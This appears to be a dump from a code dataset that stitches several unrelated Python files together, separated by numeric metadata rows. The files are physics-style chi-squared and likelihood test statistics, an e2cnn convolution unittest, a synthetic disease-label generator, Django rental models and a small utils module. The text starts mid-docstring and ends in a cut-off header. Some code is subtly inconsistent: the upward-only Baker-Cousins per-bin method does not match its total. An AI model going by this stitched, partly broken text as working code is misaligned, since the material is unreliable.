statistic is returned for the entire array.
Attributes:
_name (string): Name of test statistic.
_per_bin (bool): If True the statistic in each bin is returned as
a :class:`numpy.array`. If False one value for the statistic is
returned for the entire array.
"""
__metaclass__ = abc.ABCMeta # Only required for python 2
def __init__(self, name, per_bin=False):
self._name = name
self._per_bin = per_bin
def get_name(self):
"""
Returns:
string: Name of test statistic, stored in :attr:`_name`
"""
return self._name
def compute_statistic(self, observed, expected):
""" Compute the value of the test statistic.
Args:
observed (:class:`numpy.ndarray`): 1D array containing the
observed data points.
expected (:class:`numpy.ndarray`): 1D array containing the
expected values predicted by the model.
Returns:
(float or :class:`numpy.array`): Computed value(s) of test
statistic. A float is returned if :attr:`_per_bin` is
False. Otherwise an array of computed test statistic
values, for each bin, is returned.
"""
if len(observed.shape) != 1:
raise TypeError("Incompatible shape %s for observed array, "
"expected 1-D array" % str(observed.shape))
if len(expected.shape) != 1:
raise TypeError("Incompatible shape %s for expected array, "
"expected 1-D array" % str(expected.shape))
if len(observed) != len(expected):
raise ValueError(
"Number of bins mismatch, for observed with %d bins, "
"and expected with %d bins" % (len(observed), len(expected)))
if not self._per_bin:
return self._compute(observed, expected)
else:
return self._get_stats(observed, expected)
# Method adapted from http://codereview.stackexchange.com/a/47115
@abc.abstractmethod
def _compute(self, observed, expected):
""" Calculates the test statistic.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
float: Calculated test statistic.
"""
return None
@abc.abstractmethod
def _get_stats(self, observed, expected):
""" Gets the test statistic for each bin.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Raises:
ValueError: If arrays are different lengths.
Returns:
:class:`numpy.array`: Calculated chi squared for each bin.
"""
return None
@abc.abstractmethod
def get_penalty_term(self, current_value, prior, sigma):
""" Calculates a penalty term value, for a given fit parameter,
for this test statistic.
Args:
current_value (float): current value of a given fit parameter
prior (float): Prior value of a given fit parameter
sigma (float): Sigma value of a given fit parameter
Returns:
float: Value of the penalty term
"""
return None
class BakerCousinsChi(TestStatistic):
""" Test statistic class for calculating the Baker-Cousins
chi-squared (poisson likelihood) test statistic.
Args:
name (string): Name of test statistic.
per_bin (bool): If True (default) the statistic in each bin is
returned as a :class:`numpy.array`. If False one value for the
statistic is returned for the entire array.
Attributes:
_name (string): Name of test statistic.
_per_bin (bool): If True the statistic in each bin is returned as
a :class:`numpy.array`. If False one value for the statistic is
returned for the entire array.
"""
def __init__(self, per_bin=False):
super(BakerCousinsChi, self).__init__("baker_cousins", per_bin)
@classmethod
def _compute(self, observed, expected):
""" Calculates the chi-squared.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
float: Calculated Baker-Cousins chi squared
"""
# Convert to arrays, if observed and expected are floats
if isinstance(observed, float):
observed = numpy.array([observed])
if isinstance(expected, float):
expected = numpy.array([expected])
observed = observed.astype('float')
expected = expected.astype('float')
epsilon = 1e-34 # In the limit of zero
total = 0
for exp, obs in zip(expected, observed):
if exp < epsilon:
exp = epsilon
if obs < epsilon:
bin_value = exp
else:
bin_value = exp - obs + obs * numpy.log(obs / exp)
total += bin_value
return 2. * total
@classmethod
def _get_stats(self, observed, expected):
""" Gets chi squared for each bin.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Raises:
ValueError: If arrays are different lengths.
Returns:
:class:`numpy.array`: Calculated chi squared for each bin
"""
not_per_bin = self._compute(observed, expected)
observed = observed.astype('float')
expected = expected.astype('float')
epsilon = 1e-34 # In the limit of zero
stats = []
for exp, obs in zip(expected, observed):
if exp < epsilon:
exp = epsilon
if obs < epsilon:
bin_value = exp
else:
bin_value = exp - obs + obs * numpy.log(obs / exp)
stats.append(bin_value)
stats = 2. * numpy.array(stats)
if not numpy.allclose(numpy.sum(stats), not_per_bin):
raise ValueError("Sum of chi squared array and value returned by "
"_compute method for same observed and expected "
"do not match!")
return stats
@classmethod
def get_penalty_term(self, current_value, prior, sigma):
""" Calculates a penalty term value, for a given fit parameter,
for the BakerCousinsChi test statistic.
Args:
current_value (float): current value of a given fit parameter
prior (float): Prior value of a given fit parameter
sigma (float): Sigma value of a given fit parameter
Returns:
float: Value of the penalty term
"""
return ((current_value - prior)/float(sigma)) ** 2
class BakerCousinsChiUp(TestStatistic):
""" Test statistic class for calculating the Baker-Cousins
chi-squared (poisson likelihood) test statistic. This test statistic only
counts upward fluctuations.
Args:
name (string): Name of test statistic.
per_bin (bool): If True (default) the statistic in each bin is
returned as a :class:`numpy.array`. If False one value for the
statistic is returned for the entire array.
Attributes:
_name (string): Name of test statistic.
_per_bin (bool): If True the statistic in each bin is returned as
a :class:`numpy.array`. If False one value for the statistic is
returned for the entire array.
"""
def __init__(self, per_bin=False):
super(BakerCousinsChiUp, self).__init__("baker_cousins_up", per_bin)
@classmethod
def _compute(self, observed, expected):
""" Calculates the chi-squared.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
float: Calculated Baker-Cousins chi squared
"""
# Convert to arrays, if observed and expected are floats
if isinstance(observed, float):
observed = numpy.array([observed])
if isinstance(expected, float):
expected = numpy.array([expected])
observed = observed.astype('float')
expected = expected.astype('float')
epsilon = 1e-34 # In the limit of zero
total = 0
for exp, obs in zip(expected, observed):
if obs > exp:
continue
if exp < epsilon:
exp = epsilon
if obs < epsilon:
bin_value = exp
else:
bin_value = exp - obs + obs * numpy.log(obs / exp)
total += bin_value
return 2. * total
@classmethod
def _get_stats(self, observed, expected):
""" Gets chi squared for each bin.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Raises:
ValueError: If arrays are different lengths.
Returns:
:class:`numpy.array`: Calculated chi squared for each bin
"""
not_per_bin = self._compute(observed, expected)
observed = observed.astype('float')
expected = expected.astype('float')
epsilon = 1e-34 # In the limit of zero
stats = []
for exp, obs in zip(expected, observed):
if exp < epsilon:
exp = epsilon
if obs < epsilon:
bin_value = exp
else:
bin_value = exp - obs + obs * numpy.log(obs / exp)
stats.append(bin_value)
stats = 2. * numpy.array(stats)
if not numpy.allclose(numpy.sum(stats), not_per_bin):
raise ValueError("Sum of chi squared array and value returned by "
"_compute method for same observed and expected "
"do not match!")
return stats
@classmethod
def get_penalty_term(self, current_value, prior, sigma):
""" Calculates a penalty term value, for a given fit parameter,
for the BakerCousinsChi test statistic.
Args:
current_value (float): current value of a given fit parameter
prior (float): Prior value of a given fit parameter
sigma (float): Sigma value of a given fit parameter
Returns:
float: Value of the penalty term
"""
return ((current_value - prior)/float(sigma)) ** 2
class BakerCousinsLL(TestStatistic):
""" Test statistic class for calculating the Baker-Cousins log likelihood
ratio test statistic.
Args:
name (string): Name of test statistic.
per_bin (bool): If True (default) the statistic in each bin is
returned as a :class:`numpy.array`. If False one value for the
statistic is returned for the entire array.
Attributes:
_name (string): Name of test statistic.
_per_bin (bool): If True the statistic in each bin is returned as
a :class:`numpy.array`. If False one value for the statistic is
returned for the entire array.
"""
def __init__(self, per_bin=False):
super(BakerCousinsLL, self).__init__("baker_cousins_ll", per_bin)
@classmethod
def _compute(self, observed, expected):
""" Calculates the log likelihood.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
float: Calculated log-likelihood value
"""
# Convert to arrays, if observed and expected are floats
if isinstance(observed, float):
observed = numpy.array([observed])
if isinstance(expected, float):
expected = numpy.array([expected])
epsilon = 1e-34 # In the limit of zero
total = 0
for i in range(len(observed)):
if expected[i] < epsilon:
expected[i] = epsilon
if observed[i] < epsilon:
bin_value = expected[i]
else:
bin_value = expected[i] - observed[i] + observed[i] *\
numpy.log(observed[i] / expected[i])
total += bin_value
return total
@classmethod
def _get_stats(self, observed, expected):
""" Gets chi squared for each bin.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
:class:`numpy.array`: Calculated log-likelihood for each bin
"""
epsilon = 1e-34 # In the limit of zero
stats = []
for i in range(len(observed)):
if expected[i] < epsilon:
expected[i] = epsilon
if observed[i] < epsilon:
bin_value = expected[i]
else:
bin_value = expected[i] - observed[i] + observed[i] *\
numpy.log(observed[i] / expected[i])
stats.append(bin_value)
return numpy.array(stats)
@classmethod
def get_penalty_term(self, current_value, prior, sigma):
""" Calculates a penalty term value, for a given fit parameter,
for the BakerCousinsLL test statistic.
Args:
current_value (float): current value of a given fit parameter
prior (float): Prior value of a given fit parameter
sigma (float): Sigma value of a given fit parameter
Returns:
float: Value of the penalty term
"""
return 0.5 * ((current_value - prior)/sigma) ** 2
class Neyman(TestStatistic):
""" Test statistic class for calculating the Neyman chi-squared test
statistic.
Args:
name (string): Name of test statistic.
per_bin (bool): If True (default) the statistic in each bin is
returned as a :class:`numpy.array`. If False one value for the
statistic is returned for the entire array.
Attributes:
_name (string): Name of test statistic.
_per_bin (bool): If True the statistic in each bin is returned as
a :class:`numpy.array`. If False one value for the statistic is
returned for the entire array.
"""
def __init__(self, per_bin=False):
super(Neyman, self).__init__("neyman", per_bin)
@classmethod
def _compute(self, observed, expected):
""" Calculates chi squared.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
float: Calculated Neyman's chi squared
"""
# Convert to arrays, if observed and expected are floats
if isinstance(observed, float):
observed = numpy.array([observed])
if isinstance(expected, float):
expected = numpy.array([expected])
# Chosen due to backgrounds with low rates in ROI
epsilon = 1e-34 # In the limit of zero
total = 0
for i in range(len(observed)):
if observed[i] < epsilon:
observed[i] = epsilon
if expected[i] < epsilon:
bin_value = observed[i]
else:
bin_value = (expected[i] - observed[i])**2 / observed[i]
total += bin_value
return total
@classmethod
def _get_stats(self, observed, expected):
""" Gets chi squared for each bin.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
:class:`numpy.array`: Calculated chi squared for each bin
"""
# Chosen due to backgrounds with low rates in ROI
epsilon = 1e-34 # In the limit of zero
stats = []
for i in range(len(observed)):
if observed[i] < epsilon:
observed[i] = epsilon
if expected[i] < epsilon:
bin_value = observed[i]
else:
bin_value = (expected[i] - observed[i])**2 / observed[i]
stats.append(bin_value)
return numpy.array(stats)
@classmethod
def get_penalty_term(self, current_value, prior, sigma):
""" Calculates a penalty term value, for a given fit parameter,
for the Neyman chi squared test statistic.
Args:
current_value (float): current value of a given fit parameter
prior (float): Prior value of a given fit parameter
sigma (float): Sigma value of a given fit parameter
Returns:
float: Value of the penalty term
"""
return ((current_value - prior)/sigma) ** 2
class Pearson(TestStatistic):
""" Test statistic class for calculating the Pearson chi-squared test
statistic.
Args:
name (string): Name of test statistic.
per_bin (bool): If True (default) the statistic in each bin is
returned as a :class:`numpy.array`. If False one value for the
statistic is returned for the entire array.
Attributes:
_name (string): Name of test statistic.
_per_bin (bool): If True the statistic in each bin is returned as
a :class:`numpy.array`. If False one value for the statistic is
returned for the entire array.
"""
def __init__(self, per_bin=False):
super(Pearson, self).__init__("pearson", per_bin)
@classmethod
def _compute(self, observed, expected):
""" Calculates chi squared.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Raises:
ValueError: If arrays are different lengths.
Returns:
float: Calculated Pearson's chi squared
"""
# Convert to arrays, if observed and expected are floats
if isinstance(observed, float):
observed = numpy.array([observed])
if isinstance(expected, float):
expected = numpy.array([expected])
# Chosen due to backgrounds with low rates in ROI
epsilon = 1e-34 # Limit of zero
total = 0
for i in range(len(observed)):
if expected[i] < epsilon:
expected[i] = epsilon
if observed[i] < epsilon:
bin_value = expected[i]
else:
bin_value = (observed[i] - expected[i])**2 / expected[i]
total += bin_value
return total
@classmethod
def _get_stats(self, observed, expected):
""" Gets chi squared for each bin.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
:class:`numpy.array`: Calculated chi squared for each bin
"""
# Chosen due to backgrounds with low rates in ROI
epsilon = 1e-34 # In the limit of zero
stats = []
for i in range(len(observed)):
if expected[i] < epsilon:
expected[i] = epsilon
if observed[i] < epsilon:
bin_value = expected[i]
else:
bin_value = (observed[i] - expected[i])**2 / expected[i]
stats.append(bin_value)
return numpy.array(stats)
@classmethod
def get_penalty_term(self, current_value, prior, sigma):
""" Calculates a penalty term value, for a given fit parameter,
for the Pearson chi squared test statistic.
Args:
current_value (float): current value of a given fit parameter
prior (float): Prior value of a given fit parameter
sigma (float): Sigma value of a given fit parameter
Returns:
float: Value of the penalty term
"""
return ((current_value - prior)/sigma) ** 2
class ExtendedLL(TestStatistic):
""" Test statistic class for calculating the Extended Log Likelihood test
statistic.
Args:
name (string): Name of test statistic.
per_bin (bool): If True (default) the statistic in each bin is
returned as a :class:`numpy.array`. If False one value for the
statistic is returned for the entire array.
Attributes:
_name (string): Name of test statistic.
_per_bin (bool): If True the statistic in each bin is returned as
a :class:`numpy.array`. If False one value for the statistic is
returned for the entire array.
"""
def __init__(self, per_bin=False):
super(ExtendedLL, self).__init__("extended_ll", per_bin)
@classmethod
def _compute(self, observed, expected):
""" Calculates the Extended Log Likelihood value.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
float: Calculated Extended Log Likelihood value.
"""
# Convert to arrays, if observed and expected are floats
if isinstance(observed, float):
observed = numpy.array([observed])
if isinstance(expected, float):
expected = numpy.array([expected])
# Chosen due to backgrounds with low rates in ROI
epsilon = 1e-34 # In the limit of zero
total = 0
for exp, obs in zip(expected, observed):
if exp < epsilon:
exp = epsilon
bin_value = obs * numpy.log(exp)
total += bin_value
return expected.sum() - total
@classmethod
def _get_stats(self, observed, expected):
""" Gets the Extended Log Likelihood value for each bin.
Args:
observed (:class:`numpy.array` or float): Number of observed
events
expected (:class:`numpy.array` or float): Number of expected
events
Returns:
:class:`numpy.array`: Calculated Extended Log Likelihood value
for each bin
"""
# Chosen due to backgrounds with low rates in ROI
epsilon = 1e-34 # In the limit of zero
stats = []
for exp, obs in zip(expected, observed):
if exp < epsilon:
exp = epsilon
bin_value = obs * numpy.log(exp)
stats.append(exp - bin_value)
return numpy.array(stats)
@classmethod
def get_penalty_term(self, current_value, prior, sigma):
""" Calculates a penalty term value, for a given fit parameter,
for the Extended Log Likelihood test statistic.
Args:
current_value (float): current value of a given fit parameter
prior (float): Prior value of a given fit parameter
sigma (float): Sigma value of a given fit parameter
Returns:
float: Value of the penalty term
"""
return ((current_value - prior)/sigma) ** 2
| 35.197425
| 78
| 0.592204
| 2,957
| 24,603
| 4.85323
| 0.066283
| 0.047383
| 0.052261
| 0.033168
| 0.882726
| 0.877291
| 0.868372
| 0.839663
| 0.831092
| 0.823357
| 0
| 0.005005
| 0.325895
| 24,603
| 698
| 79
| 35.247851
| 0.860295
| 0.479413
| 0
| 0.850187
| 0
| 0
| 0.048666
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.11236
| false
| 0
| 0.007491
| 0
| 0.2397
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e86a4dabb9f2d7976f62255713ee0e659b68b271
| 4,149
|
py
|
Python
|
test/nn/test_grouped_convolution.py
|
steven-lang/e2cnn
|
48f49760766ec958b52d0dd7b02483886dfa2096
|
[
"BSD-3-Clause"
] | 356
|
2019-11-22T10:37:22.000Z
|
2022-03-25T14:42:45.000Z
|
test/nn/test_grouped_convolution.py
|
steven-lang/e2cnn
|
48f49760766ec958b52d0dd7b02483886dfa2096
|
[
"BSD-3-Clause"
] | 52
|
2020-01-20T16:51:36.000Z
|
2022-03-31T21:40:19.000Z
|
test/nn/test_grouped_convolution.py
|
steven-lang/e2cnn
|
48f49760766ec958b52d0dd7b02483886dfa2096
|
[
"BSD-3-Clause"
] | 48
|
2019-12-11T09:29:30.000Z
|
2022-03-18T17:51:55.000Z
|
import unittest
from unittest import TestCase
from e2cnn.nn import *
from e2cnn.gspaces import *
import numpy as np
class TestGroupedConv(TestCase):
def test_cyclic(self):
N = 4
g = Rot2dOnR2(N)
groups = 5
r1 = FieldType(g, list(g.representations.values()) * groups)
r2 = FieldType(g, list(g.representations.values()) * groups)
# r1 = FieldType(g, [g.trivial_repr])
# r2 = FieldType(g, [g.regular_repr])
s = 7
sigma = None
# fco = lambda r: 1. * r * np.pi
fco = None
cl = R2Conv(r1, r2, s, groups=groups, basisexpansion='blocks',
sigma=sigma,
frequencies_cutoff=fco,
bias=True)
for _ in range(8):
init.generalized_he_init(cl.weights.data, cl.basisexpansion)
cl.eval()
cl.check_equivariance()
def test_so2(self):
N = 5
g = Rot2dOnR2(-1, N)
groups = 5
r1 = FieldType(g, list(g.representations.values()) * groups)
r2 = FieldType(g, list(g.representations.values()) * groups)
s = 7
# sigma = 0.6
# fco = lambda r: 1. * r * np.pi
# fco = lambda r: 2 * r
sigma = None
fco = None
cl = R2Conv(r1, r2, s, groups=groups, basisexpansion='blocks',
sigma=sigma,
frequencies_cutoff=fco,
bias=True)
for _ in range(8):
init.generalized_he_init(cl.weights.data, cl.basisexpansion)
cl.eval()
cl.check_equivariance()
def test_dihedral(self):
N = 8
g = FlipRot2dOnR2(N, axis=np.pi/3)
groups = 5
r1 = FieldType(g, list(g.representations.values()) * groups)
r2 = FieldType(g, list(g.representations.values()) * groups)
# r1 = FieldType(g, [g.trivial_repr])
# r2 = FieldType(g, [g.fibergroup.irrep(1, 0)])
# r2 = FieldType(g, [irr for irr in g.fibergroup.irreps.values() if irr.size == 1])
# r2 = FieldType(g, [g.regular_repr])
s = 7
# sigma = 0.6
# fco = lambda r: 1. * r * np.pi
# fco = lambda r: 2 * r
sigma = None
fco = None
cl = R2Conv(r1, r2, s, groups=groups, basisexpansion='blocks',
sigma=sigma,
frequencies_cutoff=fco,
bias=True)
for _ in range(8):
init.generalized_he_init(cl.weights.data, cl.basisexpansion)
cl.eval()
cl.check_equivariance()
def test_o2(self):
N = 5
g = FlipRot2dOnR2(-1, N)
groups = 5
r1 = FieldType(g, list(g.representations.values()) * groups)
r2 = FieldType(g, list(g.representations.values()) * groups)
s = 7
# sigma = 0.6
# fco = lambda r: 1. * r * np.pi
# fco = lambda r: 2 * r
sigma = None
fco = None
cl = R2Conv(r1, r2, s, groups=groups, basisexpansion='blocks',
sigma=sigma,
frequencies_cutoff=fco,
bias=True)
for _ in range(8):
init.generalized_he_init(cl.weights.data, cl.basisexpansion)
cl.eval()
cl.check_equivariance()
def test_flip(self):
# g = Flip2dOnR2(axis=np.pi/3)
g = Flip2dOnR2(axis=np.pi/2)
groups = 5
r1 = FieldType(g, list(g.representations.values()) * groups)
r2 = FieldType(g, list(g.representations.values()) * groups)
s = 9
# sigma = 0.6
# fco = lambda r: 1. * r * np.pi
# fco = lambda r: 2 * r
sigma = None
fco = None
cl = R2Conv(r1, r2, s, groups=groups, basisexpansion='blocks',
sigma=sigma,
frequencies_cutoff=fco,
bias=True)
for _ in range(32):
init.generalized_he_init(cl.weights.data, cl.basisexpansion)
cl.eval()
cl.check_equivariance()
if __name__ == '__main__':
unittest.main()
| 30.065217
| 91
| 0.511931
| 488
| 4,149
| 4.266393
| 0.165984
| 0.076849
| 0.067243
| 0.072046
| 0.835735
| 0.817483
| 0.817483
| 0.817483
| 0.809798
| 0.789625
| 0
| 0.035276
| 0.371415
| 4,149
| 137
| 92
| 30.284672
| 0.763037
| 0.142444
| 0
| 0.76087
| 0
| 0
| 0.010744
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054348
| false
| 0
| 0.054348
| 0
| 0.119565
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cdcad2664ff4fc0a983277b7f4006530dd6c313
| 1,861
|
py
|
Python
|
data/synthetic_disease/generate.py
|
dheeraj7596/DPPred
|
125a1a9df2fdd2349ee24ad457fcada653af0975
|
[
"MIT"
] | 10
|
2017-09-18T01:44:56.000Z
|
2020-10-29T14:03:01.000Z
|
data/synthetic_disease/generate.py
|
dheeraj7596/DPPred
|
125a1a9df2fdd2349ee24ad457fcada653af0975
|
[
"MIT"
] | 1
|
2019-05-21T08:20:07.000Z
|
2019-06-17T18:18:42.000Z
|
data/synthetic_disease/generate.py
|
dheeraj7596/DPPred
|
125a1a9df2fdd2349ee24ad457fcada653af0975
|
[
"MIT"
] | 3
|
2018-01-23T18:14:51.000Z
|
2020-08-27T05:56:18.000Z
|
import random
random.seed(19910724)
N = 100000
out = open('train.csv', 'w')
out.write('age,gender=Male,gender=Female,LT1=A,LT1=B,LT1=O,LT1=AB,LT2,label\n')
for i in xrange(N):
feats = []
age = random.randint(1, 60)
feats.append(str(age))
gender = random.randint(0, 1)
feats.extend([str(gender), str(1 - gender)])
blood = random.randint(0, 3)
feats.extend([str(int(blood == 0)), str(int(blood == 1)), str(int(blood == 2)), str(int(blood == 3))])
LT2 = random.random()
feats.extend([str(LT2)])
label = 0
if (age > 18) and (gender == 1) and (blood == 3) and (LT2 > 0.6):
label = 1
if (age > 18) and (gender == 0) and (blood == 2) and (LT2 > 0.5):
label = 1
if (age <= 18) and (LT2 > 0.9):
label = 1
if random.random() < 0.001:
label = 1 - label
feats.append(str(label))
out.write(','.join(feats) + '\n')
out.close()
out = open('test.csv', 'w')
out.write('age,gender=Male,gender=Female,LT1=A,LT1=B,LT1=O,LT1=AB,LT2,label\n')
for i in xrange(N/2):
feats = []
age = random.randint(1, 60)
feats.append(str(age))
gender = random.randint(0, 1)
feats.extend([str(gender), str(1 - gender)])
blood = random.randint(0, 3)
feats.extend([str(int(blood == 0)), str(int(blood == 1)), str(int(blood == 2)), str(int(blood == 3))])
LT2 = random.random()
feats.extend([str(LT2)])
label = 0
if (age > 18) and (gender == 1) and (blood == 3) and (LT2 > 0.6):
label = 1
if (age > 18) and (gender == 0) and (blood == 2) and (LT2 > 0.5):
label = 1
if (age <= 18) and (LT2 > 0.9):
label = 1
feats.append(str(label))
out.write(','.join(feats) + '\n')
out.close()
| 27.367647
| 107
| 0.511553
| 280
| 1,861
| 3.4
| 0.175
| 0.05042
| 0.092437
| 0.063025
| 0.905462
| 0.905462
| 0.905462
| 0.905462
| 0.905462
| 0.905462
| 0
| 0.079087
| 0.293391
| 1,861
| 68
| 108
| 27.367647
| 0.644867
| 0
| 0
| 0.816327
| 0
| 0.040816
| 0.087465
| 0.073538
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.020408
| 0
| 0.020408
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa011c8b73ab890f35b0fd49e77a607a54bac1e2
| 4,103
|
py
|
Python
|
src/propertyrentals/models.py
|
kaizer88/moltrandashboad
|
590b3426ecc3a80aa31a08eb07bed224d0c2562d
|
[
"MIT"
] | null | null | null |
src/propertyrentals/models.py
|
kaizer88/moltrandashboad
|
590b3426ecc3a80aa31a08eb07bed224d0c2562d
|
[
"MIT"
] | 4
|
2021-04-08T22:01:45.000Z
|
2021-09-22T19:50:53.000Z
|
src/propertyrentals/models.py
|
kaizer88/moltrandashboad
|
590b3426ecc3a80aa31a08eb07bed224d0c2562d
|
[
"MIT"
] | null | null | null |
from django.db import models
from lib.models import BaseModel
# Create your models here.
class Country(models.Model):
name = models.CharField(max_length=255, unique=True, null=False, blank=False)
code = models.CharField(max_length=5, unique=True, null=False, blank=False)
def __str__(self):
return self.code
class Province(models.Model):
name = models.CharField(max_length=255, unique=True, null=False, blank=False)
code = models.CharField(max_length=5, unique=True, null=False, blank=False)
country = models.ForeignKey('Country', on_delete=models.CASCADE, null=False, blank=False)
def __str__(self):
return self.name
class Town(models.Model):
name = models.CharField(max_length=255, unique=True, null=False, blank=False)
code = models.CharField(max_length=5, unique=True, null=False, blank=False)
province = models.ForeignKey('Province', on_delete=models.CASCADE, null=False, blank=False)
def __str__(self):
return self.name
class Property(BaseModel):
name = models.CharField(max_length=255, unique=True, null=False, blank=False)
code = models.CharField(max_length=5, unique=True, null=False, blank=False)
address = models.CharField(max_length=5, unique=True, null=False, blank=False)
def __str__(self):
return self.code
class Address(models.Model):
property = models.ForeignKey(
'Property', related_name="property_addresses", on_delete=models.CASCADE, null=False, blank=False)
address_line_one = models.CharField(max_length=255, null=True, blank=True)
address_line_two = models.CharField(max_length=255, null=True, blank=True)
postal_code = models.CharField(max_length=255, null=True, blank=True)
town = models.ForeignKey('Town', on_delete=models.CASCADE, null=False, blank=False)
province = models.ForeignKey('Province', on_delete=models.CASCADE, null=False, blank=False)
country = models.ForeignKey('Country', on_delete=models.CASCADE, null=False, blank=False)
def __str__(self):
return self.address_line_one
class Tenant(BaseModel):
first_name = models.CharField(max_length=255, unique=True, null=False, blank=False)
last_name = models.CharField(max_length=255, unique=True, null=False, blank=False)
id_number = models.CharField(max_length=255, unique=True, null=False, blank=False)
cell_number = models.IntegerField(null=True, blank=True)
email = models.CharField(max_length=50, null=True, blank=True)
kin_number = models.IntegerField(null=True, blank=True)
kin_first_name = models.CharField(max_length=30, null=True, blank=True)
kin_last_name = models.CharField(max_length=30, null=True, blank=True)
property = models.ForeignKey('Property', on_delete=models.CASCADE, null=False, blank=False, related_name="property_tenant")
def __str__(self):
return self.first_name
class Agent(BaseModel):
first_name = models.CharField(max_length=255, unique=True, null=False, blank=False)
last_name = models.CharField(max_length=255, unique=True, null=False, blank=False)
id_number = models.CharField(max_length=255, unique=True, null=False, blank=False)
cell_number = models.IntegerField(null=True, blank=True)
email = models.CharField(max_length=50, null=True, blank=True)
kin_number = models.IntegerField(null=True, blank=True)
kin_first_name = models.CharField(max_length=30, null=True, blank=True)
kin_last_name = models.CharField(max_length=30, null=True, blank=True)
town = models.ForeignKey('Town', related_name="town_agent", on_delete=models.CASCADE, null=False, blank=False)
def __str__(self):
return self.first_name
class Profile(models.Model):
name = models.CharField(max_length=150, null=False, blank=False)
surname = models.CharField(max_length=150, null=False, blank=False)
initials = models.CharField(max_length=150, null=False, blank=False)
age = models.IntegerField(null=False, blank=False)
date_of_birth = models.CharField(max_length=150, null=False, blank=False)
def __str__(self):
return self.name
| 43.648936
| 127
| 0.737265
| 573
| 4,103
| 5.099476
| 0.109948
| 0.143737
| 0.172485
| 0.229979
| 0.863792
| 0.857632
| 0.857632
| 0.852498
| 0.785079
| 0.683436
| 0
| 0.019302
| 0.14136
| 4,103
| 94
| 128
| 43.648936
| 0.810105
| 0.005849
| 0
| 0.632353
| 0
| 0
| 0.023786
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.029412
| 0.117647
| 0.985294
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
fa6a784cc54793b1609c21b911ed01ab2cdb21fc
| 211
|
py
|
Python
|
utils/__init__.py
|
xyguo/trimmedEM
|
c350c0f1cabd54bfefcc79ba71f16fdeee9fee36
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
xyguo/trimmedEM
|
c350c0f1cabd54bfefcc79ba71f16fdeee9fee36
|
[
"MIT"
] | null | null | null |
utils/__init__.py
|
xyguo/trimmedEM
|
c350c0f1cabd54bfefcc79ba71f16fdeee9fee36
|
[
"MIT"
] | null | null | null |
from .grader import gaussian_mixture_grad, regression_mixture_grad, GMMGrader, MRMGrader
__all__ = ['gaussian_mixture_grad',
'regression_mixture_grad',
'GMMGrader',
'MRMGrader']
| 35.166667
| 88
| 0.696682
| 20
| 211
| 6.75
| 0.5
| 0.325926
| 0.281481
| 0.42963
| 0.859259
| 0.859259
| 0.859259
| 0.859259
| 0
| 0
| 0
| 0
| 0.218009
| 211
| 6
| 89
| 35.166667
| 0.818182
| 0
| 0
| 0
| 0
| 0
| 0.292453
| 0.207547
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
fa6bd1df1195504d8d4979c2bc0b94f51749c797
| 851
|
py
|
Python
|
PaddingLocation.py
|
arpansarkar190794/Arpan_Sarkar
|
b36f66f0ed00668b005fae903ce463883a803fd5
|
[
"bzip2-1.0.6"
] | null | null | null |
PaddingLocation.py
|
arpansarkar190794/Arpan_Sarkar
|
b36f66f0ed00668b005fae903ce463883a803fd5
|
[
